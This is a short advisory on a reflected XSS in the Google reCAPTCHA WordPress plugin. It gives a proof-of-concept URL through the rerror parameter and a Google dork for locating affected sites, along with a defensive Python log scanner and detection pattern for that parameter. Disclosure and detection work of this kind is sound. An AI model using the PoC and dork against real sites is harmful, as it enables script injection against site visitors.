Vulnerable : The Google reCAPTCHA WordPress plugin uses a CAPTCHA to prevent comment spam and also uses MailHide to prevent email spam
Script Page : http://www.google.com/recaptcha
POC:
http://localhost/comment-page-1/?rcommentid=(id number)&rerror=XSS
Google dork: inurl:rcommentid= error=
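A defender-side check for the parameter shown in the POC, added here as an example and not part of the original advisory or the plugin's code: it scans web server access log lines for requests that carry `rcommentid` together with an `rerror` value that is not a plain error token. The log lines are constructed samples, and the allowed token pattern and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate rerror value is a short error token such as
# "incorrect-captcha-sol" (letters, digits, hyphen, underscore only).
SAFE_TOKEN_RE = re.compile(r'[A-Za-z0-9_-]{0,64}')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_rerror(log_lines):
    """Return (line_number, decoded_value) for rerror values outside the allowlist."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "rcommentid" not in params:
            continue
        for raw in params.get("rerror", []):
            value = fully_decode(raw)
            if not SAFE_TOKEN_RE.fullmatch(value):
                hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP range, harmless markup).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /comment-page-1/?rcommentid=12&rerror=incorrect-captcha-sol HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /comment-page-1/?rcommentid=12&rerror=%3Cb%3Etest%3C%2Fb%3E HTTP/1.1" 200 5170',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] "GET /comment-page-1/?rcommentid=12&rerror=%253Cb%253Etest HTTP/1.1" 200 5165',
    '203.0.113.7 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php?p=3 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for number, value in suspicious_rerror(SAMPLE_LOG):
        print(f"line {number}: rerror={value!r}")
```

The same allowlist can be applied server-side before the value is echoed into the page, with HTML-escaping on output as the primary fix.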
Google Recaptcha XSS Vulnerability
via security-sh3ll